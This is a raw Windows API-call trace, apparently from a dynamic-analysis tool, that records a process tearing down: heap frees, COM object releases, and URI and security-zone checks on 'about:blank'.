[0091.439] ??3@YAXPAX@Z () returned 0xe0001
[0091.439] ??3@YAXPAX@Z () returned 0xa0001
[0091.439] ??3@YAXPAX@Z () returned 0x1
[0091.439] ??3@YAXPAX@Z () returned 0xffff0001
[0091.439] ??3@YAXPAX@Z () returned 0xd60001
[0091.439] ??3@YAXPAX@Z () returned 0xd20001
[0091.439] ??3@YAXPAX@Z () returned 0xf60001
[0091.439] ??3@YAXPAX@Z () returned 0xf20001
[0091.476] ??3@YAXPAX@Z () returned 0xee0001
[0091.476] ??3@YAXPAX@Z () returned 0xce0001
[0091.476] ??3@YAXPAX@Z () returned 0xea0001
[0091.476] ??3@YAXPAX@Z () returned 0xe60001
[0091.476] ??3@YAXPAX@Z () returned 0xe20001
[0091.476] ??3@YAXPAX@Z () returned 0xca0001
[0091.476] ??3@YAXPAX@Z () returned 0xde0001
[0091.476] ??3@YAXPAX@Z () returned 0xda0001
[0091.476] ??3@YAXPAX@Z () returned 0xd60001
[0091.476] ??3@YAXPAX@Z () returned 0xc60001
[0091.476] ??3@YAXPAX@Z () returned 0xc20001
[0091.476] ??3@YAXPAX@Z () returned 0xd20001
[0091.476] ??3@YAXPAX@Z () returned 0xce0001
[0091.476] ??3@YAXPAX@Z () returned 0xca0001
[0091.476] ??3@YAXPAX@Z () returned 0x1
[0091.476] ??3@YAXPAX@Z () returned 0x1
[0091.476] ??3@YAXPAX@Z () returned 0xc60001
[0091.476] ??3@YAXPAX@Z () returned 0xc20001
[0091.476] ??3@YAXPAX@Z () returned 0xbe0001
[0091.477] ??3@YAXPAX@Z () returned 0xbe0001
[0091.477] ??3@YAXPAX@Z () returned 0xba0001
[0091.477] ??3@YAXPAX@Z () returned 0xba0001
[0091.477] ??3@YAXPAX@Z () returned 0xb60001
[0091.477] ??3@YAXPAX@Z () returned 0xb20001
[0091.477] ??3@YAXPAX@Z () returned 0xb60001
[0091.477] ??3@YAXPAX@Z () returned 0xae0001
[0091.477] ??3@YAXPAX@Z () returned 0xaa0001
[0091.477] ??3@YAXPAX@Z () returned 0xa60001
[0091.477] ??3@YAXPAX@Z () returned 0xb20001
[0091.477] ??3@YAXPAX@Z () returned 0xa20001
[0091.477] ??3@YAXPAX@Z () returned 0x9e0001
[0091.477] ??3@YAXPAX@Z () returned 0x9a0001
[0091.477] ??3@YAXPAX@Z () returned 0xae0001
[0091.477] ??3@YAXPAX@Z () returned 0xaa0001
[0091.477] ??3@YAXPAX@Z () returned 0x960001
[0091.477] ??3@YAXPAX@Z () returned 0x920001
[0091.477] ??3@YAXPAX@Z () returned 0x8e0001
[0091.477] ??3@YAXPAX@Z () returned 0x8a0001
[0091.477] ??3@YAXPAX@Z () returned 0x860001
[0091.477] ??3@YAXPAX@Z () returned 0x820001
[0091.477] ??3@YAXPAX@Z () returned 0xa60001
[0091.477] ??3@YAXPAX@Z () returned 0xa20001
[0091.477] ??3@YAXPAX@Z () returned 0x7e0001
[0091.477] ??3@YAXPAX@Z () returned 0x7a0001
[0091.478] ??3@YAXPAX@Z () returned 0x760001
[0091.478] ??3@YAXPAX@Z () returned 0x9e0001
[0091.478] ??3@YAXPAX@Z () returned 0x720001
[0091.478] ??3@YAXPAX@Z () returned 0x6e0001
[0091.478] ??3@YAXPAX@Z () returned 0x6a0001
[0091.478] ??3@YAXPAX@Z () returned 0x9a0001
[0091.478] ??3@YAXPAX@Z () returned 0x660001
[0091.478] ??3@YAXPAX@Z () returned 0x620001
[0091.478] ??3@YAXPAX@Z () returned 0x5e0001
[0091.478] ??3@YAXPAX@Z () returned 0x960001
[0091.478] ??3@YAXPAX@Z () returned 0x920001
[0091.478] ??3@YAXPAX@Z () returned 0x5a0001
[0091.478] ??3@YAXPAX@Z () returned 0x560001
[0091.478] ??3@YAXPAX@Z () returned 0x520001
[0091.478] ??3@YAXPAX@Z () returned 0x4e0001
[0091.478] ??3@YAXPAX@Z () returned 0x4a0001
[0091.478] ??3@YAXPAX@Z () returned 0x460001
[0091.478] ??3@YAXPAX@Z () returned 0x8e0001
[0091.478] ??3@YAXPAX@Z () returned 0x8a0001
[0091.478] ??3@YAXPAX@Z () returned 0x420001
[0091.478] ??3@YAXPAX@Z () returned 0x3e0001
[0091.478] ??3@YAXPAX@Z () returned 0x3a0001
[0091.478] ??3@YAXPAX@Z () returned 0x860001
[0091.478] ??3@YAXPAX@Z () returned 0x360001
[0091.478] ??3@YAXPAX@Z () returned 0x320001
[0091.479] ??3@YAXPAX@Z () returned 0x2e0001
[0091.479] ??3@YAXPAX@Z () returned 0x820001
[0091.479] ??3@YAXPAX@Z () returned 0x2a0001
[0091.479] ??3@YAXPAX@Z () returned 0x260001
[0091.479] ??3@YAXPAX@Z () returned 0x220001
[0091.479] ??3@YAXPAX@Z () returned 0x7e0001
[0091.479] ??3@YAXPAX@Z () returned 0x7a0001
[0091.479] ??3@YAXPAX@Z () returned 0x1e0001
[0091.479] ??3@YAXPAX@Z () returned 0x1a0001
[0091.479] ??3@YAXPAX@Z () returned 0x160001
[0091.479] ??3@YAXPAX@Z () returned 0x120001
[0091.479] ??3@YAXPAX@Z () returned 0xe0001
[0091.479] ??3@YAXPAX@Z () returned 0xa0001
[0091.479] ??3@YAXPAX@Z () returned 0x760001
[0091.479] ??3@YAXPAX@Z () returned 0x720001
[0091.479] ??3@YAXPAX@Z () returned 0x60001
[0091.479] ??3@YAXPAX@Z () returned 0x1
[0091.479] ??3@YAXPAX@Z () returned 0x1
[0091.479] ??3@YAXPAX@Z () returned 0x1
[0091.479] ??3@YAXPAX@Z () returned 0x1
[0091.479] ??3@YAXPAX@Z () returned 0x1
[0091.479] ??3@YAXPAX@Z () returned 0x1
[0091.480] ??3@YAXPAX@Z () returned 0x1
[0091.480] ??3@YAXPAX@Z () returned 0x6e0001
[0091.480] ??3@YAXPAX@Z () returned 0x1
[0091.480] ??3@YAXPAX@Z () returned 0x6a0001
[0091.480] ??3@YAXPAX@Z () returned 0x1
[0091.480] ??3@YAXPAX@Z () returned 0x1
[0091.480] ??3@YAXPAX@Z () returned 0x1
[0091.480] ??3@YAXPAX@Z () returned 0x1
[0091.480] ??3@YAXPAX@Z () returned 0x1
[0091.480] ??3@YAXPAX@Z () returned 0x1
[0091.480] ??3@YAXPAX@Z () returned 0x1
[0091.480] ??3@YAXPAX@Z () returned 0x1
[0091.480] ??3@YAXPAX@Z () returned 0x1
[0091.480] ??3@YAXPAX@Z () returned 0x1
[0091.480] ??3@YAXPAX@Z () returned 0x1
[0091.480] ??3@YAXPAX@Z () returned 0x1
[0091.480] ??3@YAXPAX@Z () returned 0x1
[0091.480] ??3@YAXPAX@Z () returned 0x1
[0091.481] ??3@YAXPAX@Z () returned 0x1
[0091.481] ??3@YAXPAX@Z () returned 0x1
[0091.481] free (_Block=0x29b1058)
[0091.481] free (_Block=0x29b9b50)
[0091.481] free (_Block=0x29b9740)
[0091.481] free (_Block=0x29b9330)
[0091.482] free (_Block=0x29b10a0)
[0091.482] ??3@YAXPAX@Z () returned 0x1
[0091.482] ??3@YAXPAX@Z () returned 0x1
[0091.482] ??3@YAXPAX@Z () returned 0x1
[0091.482] ??3@YAXPAX@Z () returned 0x1
[0091.482] ??3@YAXPAX@Z () returned 0x1
[0091.482] StdGlobalInterfaceTable:IGlobalInterfaceTable:RevokeInterfaceFromGlobal (This=0x76fc6460, dwCookie=0x100) returned 0x0
[0091.482] StdGlobalInterfaceTable:IUnknown:Release (This=0x5fffa8) returned 0x1
[0091.482] IUnknown:Release (This=0x1369d0) returned 0x1
[0091.482] ??3@YAXPAX@Z () returned 0x1
[0091.482] IUnknown:Release (This=0x1369d0) returned 0x0
[0091.482] ISystemDebugEventFire:EndSession (This=0x1742d0) returned 0x0
[0091.482] IUnknown:Release (This=0x1742d0) returned 0x0
[0091.483] GetUserDefaultLCID () returned 0x409
[0091.483] GetACP () returned 0x4e4
[0091.483] ??3@YAXPAX@Z () returned 0x1
[0091.483] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x163d00 | out: hHeap=0x110000) returned 1
[0091.483] ??3@YAXPAX@Z () returned 0x1
[0091.483] ??3@YAXPAX@Z () returned 0x1
[0091.483] ??3@YAXPAX@Z () returned 0x1
[0091.483] ??3@YAXPAX@Z () returned 0x1
[0091.483] ??3@YAXPAX@Z () returned 0x1
[0091.483] ??3@YAXPAX@Z () returned 0x1
[0091.484] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x166e28 | out: hHeap=0x110000) returned 1
[0091.484] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x165a08 | out: hHeap=0x110000) returned 1
[0091.484] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x16a290 | out: hHeap=0x110000) returned 1
[0091.484] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x110000) returned 1
[0091.484] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x110000) returned 1
[0091.484] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x110000) returned 1
[0091.484] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x110000) returned 1
[0091.484] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x14de18 | out: hHeap=0x110000) returned 1
[0091.484] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x110000) returned 1
[0091.484] IUnknown:Release (This=0x143a40) returned 0x0
[0091.484] IUnknown:Release (This=0x1421cc) returned 0x0
[0091.485] IUnknown:Release (This=0x73da96bc) returned 0x1
[0091.485] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x1497b8 | out: hHeap=0x110000) returned 1
[0091.485] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x13e178 | out: hHeap=0x110000) returned 1
[0091.485] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x110000) returned 1
[0091.485] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x170fe8 | out: hHeap=0x110000) returned 1
[0091.485] CreateUri (in: pwzURI="about:blank", dwFlags=0x2b84, dwReserved=0x0, ppURI=0x39fbc4 | out: ppURI=0x39fbc4*=0x13baac) returned 0x0
[0091.486] IUri:GetScheme (in: This=0x13baac, pdwScheme=0x39fb5c | out: pdwScheme=0x39fb5c*=0x11) returned 0x0
[0091.486] IUnknown:QueryInterface (in: This=0x13baac, riid=0x73a2d6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x39fb64 | out: ppvObject=0x39fb64*=0x13baac) returned 0x0
[0091.486] IUnknown:Release (This=0x13baac) returned 0x2
[0091.486] IUnknown:AddRef (This=0x13baac) returned 0x3
[0091.486] IUnknown:Release (This=0x13baac) returned 0x2
[0091.486] IUri:IsEqual (in: This=0x13c184, pUri=0x13baac, pfEqual=0x39fba4 | out: pfEqual=0x39fba4*=0) returned 0x0
[0091.487] IUnknown:Release (This=0x13c184) returned 0x1
[0091.487] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x110000) returned 1
[0091.487] IUnknown:AddRef (This=0x13baac) returned 0x3
[0091.487] IUri:GetAbsoluteUri (in: This=0x13baac, pbstrAbsoluteUri=0x144ad0 | out: pbstrAbsoluteUri=0x144ad0*="about:blank") returned 0x0
[0091.487] IUnknown:Release (This=0x13baac) returned 0x2
[0091.487] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x110000) returned 1
[0091.487] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x110000) returned 1
[0091.487] IUnknown:Release (This=0x13be24) returned 0x4
[0091.487] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x12d8d0 | out: hHeap=0x110000) returned 1
[0091.487] IUnknown:Release (This=0x13be24) returned 0x3
[0091.488] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x178be0 | out: hHeap=0x110000) returned 1
[0091.488] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x1744c8 | out: hHeap=0x110000) returned 1
[0091.488] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x110000) returned 1
[0091.488] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x17a410 | out: hHeap=0x110000) returned 1
[0091.488] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x17bca0 | out: hHeap=0x110000) returned 1
[0091.488] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x14e340 | out: hHeap=0x110000) returned 1
[0091.489] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x110000) returned 1
[0091.489] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x16a1d0 | out: hHeap=0x110000) returned 1
[0091.489] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x174090 | out: hHeap=0x110000) returned 1
[0091.489] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x110000) returned 1
[0091.489] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x163ca0 | out: hHeap=0x110000) returned 1
[0091.489] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x174048 | out: hHeap=0x110000) returned 1
[0091.489] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x110000) returned 1
[0091.489] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x163cc0 | out: hHeap=0x110000) returned 1
[0091.490] CoInternetCreateSecurityManager (in: pSP=0x0, ppSM=0x1421c4, dwReserved=0x0 | out: ppSM=0x1421c4*=0x151100) returned 0x0
[0091.490] IInternetSecurityManager:SetSecuritySite (This=0x151100, pSite=0x1421cc) returned 0x0
[0091.490] IUnknown:AddRef (This=0x1421cc) returned 0x31
[0091.490] IUnknown:QueryInterface (in: This=0x1421cc, riid=0x75a961d0*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x39f83c | out: ppvObject=0x39f83c*=0x1421d0) returned 0x0
[0091.490] IServiceProvider:QueryService (in: This=0x1421d0, guidService=0x75a9f13c*(Data1=0xf1e50292, Data2=0xa795, Data3=0x4117, Data4=([0]=0x8e, [1]=0x9, [2]=0x2b, [3]=0x56, [4]=0xa, [5]=0x72, [6]=0xac, [7]=0x60)), riid=0x75a9f13c*(Data1=0xf1e50292, Data2=0xa795, Data3=0x4117, Data4=([0]=0x8e, [1]=0x9, [2]=0x2b, [3]=0x56, [4]=0xa, [5]=0x72, [6]=0xac, [7]=0x60)), ppvObject=0x151128 | out: ppvObject=0x151128*=0x0) returned 0x80004002
[0091.490] IServiceProvider:QueryService (in: This=0x1421d0, guidService=0x75a9f12c*(Data1=0xf164edf1, Data2=0xcc7c, Data3=0x4f0d, Data4=([0]=0x9a, [1]=0x94, [2]=0x34, [3]=0x22, [4]=0x26, [5]=0x25, [6]=0xc3, [7]=0x93)), riid=0x75a9f12c*(Data1=0xf164edf1, Data2=0xcc7c, Data3=0x4f0d, Data4=([0]=0x9a, [1]=0x94, [2]=0x34, [3]=0x22, [4]=0x26, [5]=0x25, [6]=0xc3, [7]=0x93)), ppvObject=0x151124 | out: ppvObject=0x151124*=0x0) returned 0x80004002
[0091.490] IServiceProvider:QueryService (in: This=0x1421d0, guidService=0x75a8c484*(Data1=0x79eac9ee, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), riid=0x75a8c484*(Data1=0x79eac9ee, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x151120 | out: ppvObject=0x151120*=0x73da96bc) returned 0x0
[0091.490] IUnknown:Release (This=0x1421d0) returned 0x0
[0091.491] IUnknown:AddRef (This=0x13baac) returned 0x3
[0091.491] IInternetSecurityManager:MapUrlToZone (in: This=0x73da96bc, pwszUrl="about:blank", pdwZone=0x39f874, dwFlags=0x0 | out: pdwZone=0x39f874*=0xffffffff) returned 0x800c0011
[0091.491] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1
[0091.491] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1
[0091.491] CoInternetIsFeatureEnabled (FeatureEntry=0xe, dwFlags=0x2) returned 0x1
[0091.491] IInternetSecurityManager:ProcessUrlAction (in: This=0x73da96bc, pwszUrl="about:blank", dwAction=0x2106, pPolicy=0x39f878, cbPolicy=0x4, pContext=0x0, cbContext=0x0, dwFlags=0x41, dwReserved=0x0 | out: pPolicy=0x39f878*=0x0) returned 0x0
[0091.491] IUnknown:Release (This=0x13baac) returned 0x2
[0091.491] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x178bb0 | out: hHeap=0x110000) returned 1
[0091.492] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x14e658 | out: hHeap=0x110000) returned 1
[0091.492] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x110000) returned 1
[0091.492] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x110000) returned 1
[0091.492] IUnknown:Release (This=0x13a4d0) returned 0x1
[0091.492] IUnknown:Release (This=0x13baac) returned 0x1
[0091.492] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x144ad0 | out: hHeap=0x110000) returned 1
[0091.492] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x167958 | out: hHeap=0x110000) returned 1
[0091.493] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x1490a0 | out: hHeap=0x110000) returned 1
[0091.493] LsDestroyContext () returned 0x0
[0091.493] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x17c508 | out: hHeap=0x110000) returned 1
[0091.493] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x152ab8 | out: hHeap=0x110000) returned 1
[0091.493] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x161030 | out: hHeap=0x110000) returned 1
[0091.494] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x152ae8 | out: hHeap=0x110000) returned 1
[0091.494] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x16dc00 | out: hHeap=0x110000) returned 1
[0091.494] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x16dc28 | out: hHeap=0x110000) returned 1
[0091.494] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x17db18 | out: hHeap=0x110000) returned 1
[0091.495] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x174480 | out: hHeap=0x110000) returned 1
[0091.495] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x164940 | out: hHeap=0x110000) returned 1
[0091.495] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x16dc50 | out: hHeap=0x110000) returned 1
[0091.495] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x164968 | out: hHeap=0x110000) returned 1
[0091.496] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x17f3e8 | out: hHeap=0x110000) returned 1
[0091.496] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x161320 | out: hHeap=0x110000) returned 1
[0091.496] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x1696a0 | out: hHeap=0x110000) returned 1
[0091.496] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x1696b0 | out: hHeap=0x110000) returned 1
[0091.496] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x1696c0 | out: hHeap=0x110000) returned 1
[0091.496] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x1696d0 | out: hHeap=0x110000) returned 1
[0091.497] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x17b900 | out: hHeap=0x110000) returned 1
[0091.497] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x17ba30 | out: hHeap=0x110000) returned 1
[0091.497] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x161728 | out: hHeap=0x110000) returned 1
[0091.497] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x161838 | out: hHeap=0x110000) returned 1
[0091.497] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x161970 | out: hHeap=0x110000) returned 1
[0091.498] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x18a3b8 | out: hHeap=0x110000) returned 1
[0091.498] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x18efd8 | out: hHeap=0x110000) returned 1
[0091.498] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x1220d0 | out: hHeap=0x110000) returned 1
[0091.498] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x17a3f0 | out: hHeap=0x110000) returned 1
[0091.499] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x187930 | out: hHeap=0x110000) returned 1
[0091.499] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x17ea78 | out: hHeap=0x110000) returned 1
[0091.499] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x187ff0 | out: hHeap=0x110000) returned 1
[0091.499] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x162068 | out: hHeap=0x110000) returned 1
[0091.500] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x18c760 | out: hHeap=0x110000) returned 1
[0091.500] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x18d258 | out: hHeap=0x110000) returned 1
[0091.500] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x14e448 | out: hHeap=0x110000) returned 1
[0091.500] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x161f70 | out: hHeap=0x110000) returned 1
[0091.501] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x161a88 | out: hHeap=0x110000) returned 1
[0091.501] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x187820 | out: hHeap=0x110000) returned 1
[0091.501] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x17be90 | out: hHeap=0x110000) returned 1
[0091.501] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x1547f0 | out: hHeap=0x110000) returned 1
[0091.501] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x188270 | out: hHeap=0x110000) returned 1
[0091.502] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x189708 | out: hHeap=0x110000) returned 1
[0091.504] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x1897c8 | out: hHeap=0x110000) returned 1
[0091.504] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x187f28 | out: hHeap=0x110000) returned 1
[0091.504] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x187e60 | out: hHeap=0x110000) returned 1
[0091.504] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x110000) returned 1
[0091.504] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x17b6a8 | out: hHeap=0x110000) returned 1
[0091.505] IUnknown:Release (This=0x151100) returned 0x0
[0091.505] IUnknown:Release (This=0x1421cc) returned 0x0
[0091.505] IUnknown:Release (This=0x73da96bc) returned 0x7fff
[0091.505] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x12d9e8 | out: hHeap=0x110000) returned 1
[0091.505] IUnknown:Release (This=0x1429d8) returned 0x0
[0091.506] GetModuleHandleW (lpModuleName="OLEAUT32") returned 0x757f0000
[0091.507] GetProcAddress (hModule=0x757f0000, lpProcName=0xc9) returned 0x757f4af8
[0091.507] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0091.507] IInternetSession:UnregisterNameSpace (This=0x1467f8, pCF=0x73da8c50, pszProtocol="res") returned 0x0
[0091.507] IUnknown:Release (This=0x73da8c50) returned 0x1
[0091.507] IInternetSession:UnregisterNameSpace (This=0x1467f8, pCF=0x73da8c70, pszProtocol="about") returned 0x0
[0091.507] IUnknown:Release (This=0x73da8c70) returned 0x1
[0091.507] IUnknown:Release (This=0x1467f8) returned 0x1
[0091.508] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x133998 | out: hHeap=0x110000) returned 1
[0091.508] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x150768 | out: hHeap=0x110000) returned 1
[0091.508] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x1241a0 | out: hHeap=0x110000) returned 1
[0091.508] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x124ab0 | out: hHeap=0x110000) returned 1
[0091.509] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x150810 | out: hHeap=0x110000) returned 1
[0091.509] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x12d138 | out: hHeap=0x110000) returned 1
[0091.509] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x13e280 | out: hHeap=0x110000) returned 1
[0091.509] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x14dd68 | out: hHeap=0x110000) returned 1
[0091.510] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x1502e0 | out: hHeap=0x110000) returned 1
[0091.510] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x1248a0 | out: hHeap=0x110000) returned 1
[0091.510] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x150380 | out: hHeap=0x110000) returned 1
[0091.510] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x14ef98 | out: hHeap=0x110000) returned 1
[0091.510] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x124858 | out: hHeap=0x110000) returned 1
[0091.511] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x148f80 | out: hHeap=0x110000) returned 1
[0091.511] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x13e130 | out: hHeap=0x110000) returned 1
[0091.511] IUnknown:Release (This=0x149038) returned 0x0
[0091.511] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x140b10 | out: hHeap=0x110000) returned 1
[0091.511] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x110000) returned 1
[0091.511] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x110000) returned 1
[0091.512] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x13dfc8 | out: hHeap=0x110000) returned 1
[0091.512] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x140bd8 | out: hHeap=0x110000) returned 1
[0091.512] DeleteDC (hdc=0x5b0108ae) returned 1
[0091.512] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x1430d8 | out: hHeap=0x110000) returned 1
[0091.512] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x143070 | out: hHeap=0x110000) returned 1
[0091.513] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x1291f8 | out: hHeap=0x110000) returned 1
[0091.513] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x1433b0 | out: hHeap=0x110000) returned 1
[0091.514] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x143148 | out: hHeap=0x110000) returned 1
[0091.514] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x129248 | out: hHeap=0x110000) returned 1
[0091.514] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x151168 | out: hHeap=0x110000) returned 1
[0091.515] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x1291a8 | out: hHeap=0x110000) returned 1
[0091.515] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x151370 | out: hHeap=0x110000) returned 1
[0091.515] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x129298 | out: hHeap=0x110000) returned 1
[0091.516] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x1513d8 | out: hHeap=0x110000) returned 1
[0091.516] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x1292e8 | out: hHeap=0x110000) returned 1
[0091.516] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x110000) returned 1
[0091.516] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x129388 | out: hHeap=0x110000) returned 1
[0091.516] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x110000) returned 1
[0091.517] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x1293d8 | out: hHeap=0x110000) returned 1
